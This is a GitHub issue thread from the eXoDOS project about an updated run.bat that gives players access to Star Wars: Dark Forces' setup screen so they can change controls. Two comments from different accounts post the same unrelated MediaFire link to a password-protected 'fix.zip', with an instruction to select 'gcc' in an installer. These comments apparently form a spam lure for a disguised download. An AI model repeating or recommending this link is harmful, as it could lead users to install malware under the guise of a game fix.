### ISSUE TITLE
Star Wars - Dark Forces (1995)

### ISSUE THREAD

**Issue by Python-Exoproject** [exoscoriae/eXoDOS#5373]
It was reported by Jenavieve Rose on Discord that you need to enter the games setup to modify controls. This has been added to this updated run.bat: [run.zip](https://github.com/user-attachments/files/16749066/run.zip)

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by exoscoriae** [comment]
added
